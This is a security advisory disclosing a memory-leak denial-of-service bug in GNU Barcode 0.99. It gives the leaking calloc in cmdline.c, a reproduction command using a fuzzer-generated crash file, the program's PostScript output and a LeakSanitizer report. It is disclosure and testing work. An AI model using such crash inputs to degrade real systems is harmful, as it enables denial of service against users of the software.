# GNU Barcode 0.99 - Memory Leak# Vendor: The GNU Project | Free Software Foundation, Inc.# Product web page: https://www.gnu.org/software/barcode/# https://directory.fsf.org/wiki/Barcode# Affected version: 0.99# Tested on: Ubuntu 16.04.4# Author: Gjoko 'LiquidWorm' Krstic# Summary: GNU Barcode is a tool to convert text strings to printed bars.# It supports a variety of standard codes to represent the textual strings# and creates postscript output.# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited# by malicious people to cause a DoS (Denial of Service). The vulnerability is# caused due to an error in the 'cmdline.c', which can be exploited to cause a# memory leak via a specially crafted file. The vulnerability is confirmed in# version 0.99. Other versions may also be affected.
cmdline.c:
128: int commandline(struct commandline *args, int argc, char **argv,
129: char *errorhead)130: {131: struct commandline *ptr;132: char *getopt_desc =(char *)calloc(512, 1);133: int desc_offset =0;134: int opt, retval;135: char *value;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 11
% Printing barcode for"id:000034,sig:06,src:000000,op:havoc,rep:128", scaled1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
%heightxpos yposwidth heightxpos yposwidth
[75.0011.0015.001.85][75.0013.5015.000.85][75.0016.5015.000.85][70.0021.5020.000.85][70.0027.0020.003.85][70.0030.5020.000.85][70.0032.5020.000.85][70.0035.5020.002.85][70.0040.0020.001.85][70.0043.5020.000.85][70.0048.5020.000.85][70.0051.0020.001.85][70.0054.5020.000.85][70.0057.5020.000.85][70.0062.0020.003.85][70.0065.5020.000.85][70.0068.5020.000.85][70.0071.0020.001.85][70.0076.5020.000.85][70.0080.0020.003.85][70.0084.5020.000.85][70.0087.5020.000.85][70.0091.0020.001.85][70.0096.5020.000.85][70.0098.5020.000.85][70.00101.0020.001.85][70.00104.5020.000.85][70.00109.5020.000.85][70.00113.0020.003.85][70.00117.5020.000.85][70.00120.5020.000.85][70.00123.5020.002.85][70.00128.0020.001.85][70.00131.5020.000.85][70.00137.0020.001.85][70.00139.5020.000.85][70.00142.5020.000.85][70.00147.5020.000.85][70.00151.0020.001.85][70.00154.5020.002.85][70.00158.5020.000.85][70.00162.0020.001.85][70.00164.5020.000.85][70.00168.5020.002.85][70.00172.0020.001.85][70.00175.5020.000.85][70.00179.5020.002.85][70.00183.0020.001.85][70.00186.5020.000.85][70.00190.5020.002.85][70.00194.0020.001.85][70.00197.5020.000.85][70.00201.5020.002.85][70.00205.0020.001.85][70.00209.0020.001.85][70.00212.5020.000.85][70.00215.5020.002.85][70.00220.0020.001.85][70.00223.5020.000.85][70.00227.5020.002.85][70.00230.5020.000.85][70.00233.0020.001.85][70.00237.5020.002.85][70.00241.5020.000.85][70.00245.0020.003.85][70.00249.5020.000.85][70.00252.5020.000.85][70.00258.0020.001.85][70.00260.5020.000.85][70.00263.5020.000.85][70.00267.0020.001.85][70.00269.5020.000.85][70.00275.5020.002.85][70.00279.5020.000.85][70.00283.0020.001.85][70.00285.5020.000.85][70.00289.5020.002.85][70.00293.0020.001.85][70.00297.0020.001.85][70.00301.5020.002.85][70.00304.5020.000.85][70.00307.5020.000.85][70.00310.0020.001.85][70.00314.5020.002.85][70.00318.5020.000.85][70.00322.0020.003.85][70.00326.5020.000.85][70.00329.5020.000.85][70.00332.5020.000.85][70.00337.0020.003.85][70.00340.5020.000.85][70.00345.5020.000.85][70.00348.0020.001.85][70.00352.5020.002.85][70.00356.5020.000.85][70.00360.0020.001.85][70.00362.5020.000.85][70.00366.5020.002.85][70.00370.0020.001.85][70.00373.5020.000.85][70.00377.5020.002.85][70.00381.0020.001.85][70.00384.5020.000.85][70.00388.5020.002.85][70.00392.0020.001.85][70.00395.5020.000.85][70.00399.5020.002.85][70.00403.0020.001.85][70.00406.5020.000.85][70.00410.5020.002.85][70.00414.0020.001.85][70.00417.5020.000.85][70.00421.5020.002.85][70.00425.0020.001.85][70.00428.5020.000.85][70.00431.0020.001.85][70.00435.5020.002.85][70.00439.5020.000.85][70.00445.0020.003.85][70.00448.5020.000.85][70.00450.5020.000.85][70.00452.5020.000.85][70.00457.0020.003.85][70.00462.5020.002.85][70.00466.5020.000.85][70.00470.0020.001.85][70.00472.5020.000.85][70.00476.0020.001.85][70.00481.5020.000.85][70.00483.5020.000.85][70.00486.5020.000.85][70.00489.0020.001.85][70.00496.0020.003.85][70.00499.5020.000.85][70.00502.5020.000.85][70.00505.5020.000.85][70.00511.0020.003.85][70.00514.5020.000.85][70.00516.5020.000.85][70.00521.5020.000.85][70.00524.0020.001.85][70.00527.5020.000.85][70.00530.0020.001.85][70.00534.5020.002.85][70.00538.5020.000.85][70.00541.5020.000.85][70.00546.0020.003.85][70.00549.5020.000.85][70.00552.0020.001.85][70.00555.5020.000.85][70.00560.5020.000.85][70.00562.5020.000.85][70.00567.0020.003.85][70.00572.5020.002.85][70.00576.5020.000.85][70.00580.0020.001.85][70.00582.5020.000.85][70.00586.5020.002.85][70.00591.0020.001.85][70.00594.0020.001.85][70.00598.5020.002.85][70.00602.5020.000.85][70.00605.5020.002.85][70.00608.5020.000.85][70.00612.0020.001.85][70.00615.5020.000.85][70.00620.0020.001.85][70.00622.5020.000.85][75.00627.0015.001.85][75.00632.5015.002.85][75.00635.5015.000.85][75.00638.0015.001.85]]{{} forall setlinewidth moveto 0 exch rlineto stroke}bind forall
[
% charxpos ypos fontsize
[(o)21.0010.00 12.00][(/)32.0010.000.00][(c)43.0010.000.00][(r)54.0010.000.00][(a)65.0010.000.00][(s)76.0010.000.00][(h)87.0010.000.00][(e)98.0010.000.00][(s)109.0010.000.00][(/)120.0010.000.00][(i)131.0010.000.00][(d)142.0010.000.00][(:)153.0010.000.00][(0)164.0010.000.00][(0)175.0010.000.00][(0)186.0010.000.00][(0)197.0010.000.00][(3)208.0010.000.00][(4)219.0010.000.00][(,)230.0010.000.00][(s)241.0010.000.00][(i)252.0010.000.00][(g)263.0010.000.00][(:)274.0010.000.00][(0)285.0010.000.00][(6)296.0010.000.00][(,)307.0010.000.00][(s)318.0010.000.00][(r)329.0010.000.00][(c)340.0010.000.00][(:)351.0010.000.00][(0)362.0010.000.00][(0)373.0010.000.00][(0)384.0010.000.00][(0)395.0010.000.00][(0)406.0010.000.00][(0)417.0010.000.00][(,)428.0010.000.00][(o)439.0010.000.00][(p)450.0010.000.00][(:)461.0010.000.00][(h)472.0010.000.00][(a)483.0010.000.00][(v)494.0010.000.00][(o)505.0010.000.00][(c)516.0010.000.00][(,)527.0010.000.00][(r)538.0010.000.00][(e)549.0010.000.00][(p)560.0010.000.00][(:)571.0010.000.00][(1)582.0010.000.00][(2)593.0010.000.00][(8)604.0010.000.00]]{{} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
}{pop} ifelse
moveto show}bind forall
% End barcode for"id:000034,sig:06,src:000000,op:havoc,rep:128"
showpage
%%Trailer
==2183==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 512 byte(s)in1 object(s) allocated from:
#0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)#1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
Direct leak of 55 byte(s)in1 object(s) allocated from:
#0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)#1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
SUMMARY: AddressSanitizer: 567 byte(s) leaked in2 allocation(s).
